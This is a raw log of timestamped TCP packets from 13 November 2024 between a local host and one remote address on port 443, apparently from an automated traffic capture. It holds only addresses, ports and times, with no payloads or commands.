Nov 13, 2024 18:44:18.686624050 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.686827898 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.686844110 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.716474056 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.716538906 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.758507967 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.758665085 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.758718967 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.758810043 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.758821964 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.758836985 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.758841038 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.761307955 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.761394024 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.761476994 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.761655092 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.761694908 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.997498035 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.997539997 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.033540010 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.034091949 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.034153938 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.034498930 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.034554958 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.151928902 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.152286053 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.152316093 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.152579069 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.152585030 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.160056114 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.160463095 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.160528898 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.160691977 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.160707951 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.172502041 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.172653913 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.172728062 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.172808886 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.172808886 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.172851086 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.172887087 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.174789906 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.174827099 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.174901962 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.175010920 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.175021887 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.282602072 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.282813072 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.282973051 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.282974005 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.282974005 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.284739017 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.284828901 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.284943104 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.285027027 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.285052061 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.294425011 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.294590950 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.294656038 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.294929028 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.294929028 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.294996023 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.295037985 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.296256065 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.296303988 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.296367884 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.296458960 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.296471119 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.414875984 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.415266037 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.415283918 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.415719032 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.415730000 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.508635044 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.509222031 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.509287119 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.509352922 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.509370089 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.544308901 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.544380903 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.544434071 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.544662952 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.544673920 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.544719934 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.544727087 CET	443	49812	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.546861887 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.546890974 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.546963930 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.547184944 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.547199965 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.591356993 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.591392994 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.644809008 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.644862890 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.644989014 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.645097017 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.645365000 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.645365000 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.647329092 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.647330999 CET	49813	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.647367954 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.647372007 CET	443	49813	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.647449017 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.647579908 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.647589922 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.934138060 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.934722900 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.934789896 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:19.935024023 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:19.935039997 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.059595108 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.062851906 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.063018084 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.063225985 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.078845978 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.089140892 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.089206934 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.089514971 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.089571953 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.089687109 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.089687109 CET	49814	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.089767933 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.089806080 CET	443	49814	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.091046095 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.091110945 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.091593981 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.091609001 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.093269110 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.093302965 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.093364954 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.093466043 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.093472958 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.218369961 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.218425989 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.218560934 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.218647003 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.218647003 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.220844030 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.221518993 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.221704960 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.240536928 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.240605116 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.240714073 CET	49816	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.240732908 CET	443	49816	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.261688948 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.261688948 CET	49815	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.261761904 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.261852980 CET	443	49815	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.266788006 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.266877890 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.266957998 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.268044949 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.268122911 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.268132925 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.268207073 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.268213034 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.268286943 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.268311024 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.290124893 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.294022083 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.294044971 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.294385910 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.294393063 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.399415970 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.400095940 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.400161028 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.400413990 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.400428057 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.419846058 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.419862032 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.419920921 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.419941902 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.419984102 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.420057058 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.420063972 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.420078993 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.420228004 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.420311928 CET	443	49817	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.420350075 CET	49817	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.422508955 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.422597885 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.422683001 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.422802925 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.422841072 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.530850887 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.530898094 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.531012058 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.531021118 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.531084061 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.531127930 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.531127930 CET	49818	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.531171083 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.531203032 CET	443	49818	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.533145905 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.533188105 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.533323050 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.533421993 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.533446074 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.830321074 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.830770016 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.830801010 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.831383944 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.831391096 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.965223074 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.965389013 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.965539932 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.965761900 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.965795994 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.965836048 CET	49819	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.965845108 CET	443	49819	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.968122959 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.968153000 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:20.968223095 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.968310118 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:20.968314886 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.019535065 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.020056963 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.020123005 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.020292997 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.020308018 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.026607990 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.026842117 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.026891947 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.027127028 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.027134895 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.144062042 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.144473076 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.144536972 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.144864082 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.144880056 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.153090954 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.153244972 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.153455019 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.153455973 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.153455973 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.155731916 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.155821085 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.155920029 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.156229019 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.156316042 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.156744003 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.156904936 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.156980991 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.157105923 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.157105923 CET	49821	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.157149076 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.157181978 CET	443	49821	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.158694029 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.158724070 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.158797026 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.158895969 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.158902884 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.271199942 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.271250010 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.271380901 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.271465063 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.271502972 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.271553993 CET	49822	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.271569967 CET	443	49822	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.273277998 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.273365974 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.273468018 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.273806095 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.273895025 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.308006048 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.308418989 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.308451891 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.308712959 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.308722019 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.444835901 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.444952965 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.445135117 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.445135117 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.445135117 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.447710991 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.447808027 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.447899103 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.448026896 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.448050022 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.466347933 CET	49820	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.466414928 CET	443	49820	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.718571901 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.719048977 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.719070911 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.719393015 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.719398022 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.747637987 CET	49823	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.747670889 CET	443	49823	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.848566055 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.848730087 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.848778963 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.848822117 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.848844051 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.848861933 CET	49824	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.848869085 CET	443	49824	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.851416111 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.851511002 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.851612091 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.851727962 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.851767063 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.903812885 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.904175997 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.904192924 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:21.904522896 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:21.904530048 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.038073063 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.038357973 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.038417101 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.038446903 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.038446903 CET	49826	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.038466930 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.038482904 CET	443	49826	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.040430069 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.040524006 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.040601969 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.040718079 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.040740967 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.044924021 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.046490908 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.046523094 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.047033072 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.047038078 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.195784092 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.195883989 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.196049929 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.196091890 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.196110010 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.196124077 CET	49827	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.196130037 CET	443	49827	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.198337078 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.198427916 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.198551893 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.198632002 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.198651075 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.200860023 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.201251030 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.201312065 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.201508045 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.201523066 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.348201990 CET	443	49828	13.107.246.45	192.168.2.4
